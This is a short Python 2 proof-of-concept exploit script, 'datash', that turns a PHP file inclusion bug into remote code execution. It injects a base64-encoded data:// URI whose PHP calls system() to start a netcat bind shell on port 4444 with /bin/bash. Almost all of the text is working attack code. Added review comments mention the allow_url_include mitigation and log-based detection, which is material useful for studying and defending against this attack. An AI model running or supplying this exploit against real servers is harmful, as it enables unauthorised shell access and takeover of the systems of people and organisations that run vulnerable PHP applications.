This is a small proof of concept tool that leverages the data:// stream to gain remote code execution from a file inclusion vulnerability.
c8c8bbfa963434111dffb850c77790720a4f7b2c74f7310ff876ccea44eb66f6
#!/usr/bin/python
# datash v0.1
# Uses PHP's data:// stream for RCE
# For abusing File Inclusion Bugs.
# Author: Darren 'infodox' Martyn
# Site: insecurety.net
# Twatter: @info_dox
import sys
import requests
def banner():
    """Write the datash banner and its short description to stdout.

    The text is emitted exactly as a Python 2 ``print`` of the literal would
    emit it: the leading newline, the block, and one trailing newline.
    """
    text = """
data shell
datash v0.1 - Insecurety Research
Abuses PHP's data:// stream to execute remote code on servers which are
1. Vulnerable to File Inclusion
2. Allowing data:// to be included
Reliable enough...
~ infodox
"""
    sys.stdout.write(text + "\n")
# Argument check: exactly one positional argument is expected, the URL up to
# and including the '=' of the parameter that is passed to include().
if len(sys.argv) != 2:
    banner()
    print "Usage: ./datash.py <target url>"
    print "Example: ./datash.py http://localhost/include.php?hax="
    sys.exit(1)
targeturl = sys.argv[1]
# NOTE(review): the command is a hard-coded literal and is interpolated into
# the PHP source below without any escaping of the single quotes it sits in.
payload = """nc -lvp 4444 -e /bin/bash &""" # FIXME - Multiple payloads later ;) This is just PoC
phpwrapper = """<?php system('%s'); ?>""" %(payload) # FIXME - Allow multiple PHP wrappers... Later!
# Python 2 only: str.encode('base64') is the Python 2 codec (removed in 3.x),
# and the bare `print` statements in this file are Python 2 syntax as well.
encodedphp = phpwrapper.encode('base64') # Base64 encode the php wrapper with the payload in it
# The data:// URI carrying the base64 PHP. On the server side a data: wrapper
# can only be include()d when allow_url_include is enabled (off by default in
# modern PHP), so keeping that directive off is the primary mitigation; the
# application must additionally never pass unvalidated user input to
# include()/require(). Detection: alert on request parameters whose value
# begins with a stream wrapper such as data:// (or php://, expect://, etc.)
# in web-server or WAF logs.
inject = """data://text/plain;base64,%s""" %(encodedphp) # This is the data:// injecty thingy :3
print "[+] Target Host: %s" %(targeturl)
print "[*] Popping Shell on 4444... Use netcat to connect..."
# Plain string concatenation: the URI is appended to whatever the caller gave,
# with no URL encoding of the base64 text (which may contain '+', '/', '=').
hack = targeturl+inject
# A single GET whose response is discarded: the script never checks whether
# the inclusion succeeded, so the closing line prints unconditionally.
requests.get(hack) # Like my terrible variable names and use of Requests? You better!
print "[:>] Hope you had fun ;)"